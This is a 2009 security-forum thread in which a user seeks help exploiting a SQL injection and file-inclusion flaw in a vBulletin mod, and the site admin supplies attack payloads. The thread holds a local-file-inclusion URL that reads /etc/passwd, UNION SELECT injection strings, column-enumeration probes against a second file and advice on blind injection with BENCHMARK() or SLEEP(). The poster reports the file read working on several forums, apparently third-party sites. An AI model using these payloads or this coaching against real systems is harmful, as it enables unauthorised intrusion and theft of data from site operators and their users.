 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Help with Mysql Injection - Bugged script |
 |
 Posted: Sun Jan 11, 2009 4:22 pm |
 |
|
| delta |
| Advanced user |
 |
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
 |
|
 |
|
I found this bug in one component and i think that can be exploited, but need some help...
I will give some details...
| Quote: | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204
Warning: include(folder/forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/file.php on line 300
Warning: include() [function.include]: Failed opening 'folder/forms/.php' for inclusion (include_path='.:/usr/lib/php') in [path]/file.php on line 300 |
Some piece of code of file.php:
| Code: | if($form){
$the_target = $form;
$the_target = explode(",",$the_target);
$forum = $the_target[0];
$formulario = $the_target[1];
$links = $the_target[2];
$sqlSecure="select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );
$qrySecure = mysql_query($sqlSecure);
$forum_permitido=(mysql_num_rows($qrySecure))?true:false;
|
Line 204:
| Code: | $forum_permitido=(mysql_num_rows($qrySecure))?true:false;
|
Query of table up_grupos:
| Code: |
CREATE TABLE `". TABLE_PREFIX ."up_grupos` (
`id` int(11) NOT NULL auto_increment,
`idGrupo` int(11) default NULL,
`descricao` varchar(150) default NULL,
`tipo` varchar(4) NOT NULL default 'http',
`conteudo` varchar(20) NOT NULL default 'filme',
`nivel` decimal(2,0) NOT NULL default '0',
`forumid` int(11) default NULL,
`permissoes` varchar(5) NOT NULL default 'staff',
PRIMARY KEY (`id`)
) ENGINE=MyISAM ;
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Jan 13, 2009 3:30 am |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
So... no one?  =/ |
|
|
|
|
| Posted: Wed Jan 14, 2009 12:52 pm |
|
|
| Rastlin |
| Regular user |
 |
|
| Joined: Jan 03, 2009 |
| Posts: 21 |
|
|
|
|
|
|
|
| delta wrote: | | So... no one? =/ |
There is insuficient data .... I mighty try to guess that somehow your giving a wrong path somewhere .... |
|
|
|
|
| Posted: Wed Jan 14, 2009 1:40 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| More info needed - input parameters. There can be blind sql injection or maybe even LFI or RFI, but without additional info we can't help you. |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 3:23 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
I don't think it's RFI or LFI.
It's a vbulletin MOD.
This send information to the database. Ex.:
http://site.com/forum/file.php?form=9,blabla,http
It uses explodes as you can see in the code:
| Code: | | $the_target = explode(",",$the_target); |
and send to these vars...
| Code: | $forum = $the_target[0];
$formulario = $the_target[1];
$links = $the_target[2]; |
and then comes the query:
| Code: | $sqlSecure="select id from ".TABLE_PREFIX."up_grupos where forumid = '".$forum."'".( ($membroNormal)?" and `permissoes`='livre'":"" );
$qrySecure = mysql_query($sqlSecure) |
So, teorically i should do that:
http://site.com/forum/file.php?form=SQL INJECTION CODE,blabla,http
Sry for my poor english and thanks in advance for the help.
Edited:
Now i tried http://site.com/forum/file.php?form=9',blabla,http as i said before and got only this:
| Code: | | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [path]/file.php on line 204 |
[/i]
No other errors 
And i forgot to thell that he gets the $formulario and do this in other line of the code:
| Code: | | include "folder/forms/".$formulario.".php"; |
That's the reason i' was getting the 2 include errors...
Sooo...
That helps now? |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 4:15 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This can be LFI, try this:
| Code: |
http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http
|
For sql injection try:
| Code: |
http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http
|
| Code: |
http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http
|
This is probably blind sql injection though. Can you post that MOD-s name? I can look @ src code and look for possible exploits  |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 5:12 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
| waraxe wrote: | This can be LFI, try this:
| Code: |
http://site.com/forum/file.php?form=9,../../../../../../../../../../etc/passwd%00,http
|
For sql injection try:
| Code: |
http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http
|
| Code: |
http://site.com/forum/file.php?form=-1'+UNION+SELECT+1--+,bla,http
|
This is probably blind sql injection though. Can you post that MOD-s name? I can look @ src code and look for possible exploits |
The LFI works fine(in some forums i get 403 or 406) xD
I tried the sql injection | Code: | | http://site.com/forum/file.php?form=-1'+UNION+SELECT+0--+,bla,http |
and no erros displayed.
The problem now is how i can exploit the injection since can't use "," because of the explode :S
The mod have 1 more sql injection bugged file that i found, can't give you the mod name now, but later maybe 
Thanks a lot for your help |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 7:16 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Yes, this can be tricky without ","-s. But you could probably use regular expressions (regexes) instead of ORD(SUBSTR(hash,2,1)) and CASE/WHERE/ELSE instead of IF(1,2,3). I'm not 100% sure about that, it needs testing |
|
|
|
|
| Posted: Wed Jan 14, 2009 7:27 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
This will be very complicated T___T
I think that's better to try the other file...
Do you mind taking a look in the other file to see what can be done?
If ok i will send to you via PM. |
|
|
|
|
| Posted: Wed Jan 14, 2009 8:59 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| I'm too busy right now - new advisory is coming out very soon and i'm preparing it right now |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 9:11 pm |
|
|
| delta |
| Advanced user |
|
|
| Joined: Jan 11, 2009 |
| Posts: 60 |
|
|
|
|
|
|
|
Ok, no problem ^^
In the other file i'm getting some erros:
http://site.com/file.php?do=lol&action=form&id_topic=6727'
| Quote: | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 237
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 266
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 288
Warning: include(forms/.php) [function.include]: failed to open stream: No such file or directory in [path]/folder/editar.php on line 436
Warning: include() [function.include]: Failed opening 'forms/.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in [path]/folder/editar.php on line 436 |
When i do:
http://site.com/file.php?do=lol&action=form&id_topic=-1'+UNION+SELECT+1,2,3,4--+
this error disappear(same if i change the column number, others erros will disappear and some remain because the column number of tables is different):
| Code: | | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [path]/folder/editar.php on line 244 |
but not any number of column displays in the page, what can i do next? |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 14, 2009 9:54 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| As usual - if you can't get direct visual feedback from target, then try blind injection. Look for response differences or as last resort use BENCHMARK() or SLEEP(). |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 79
Members: 0
Total: 79
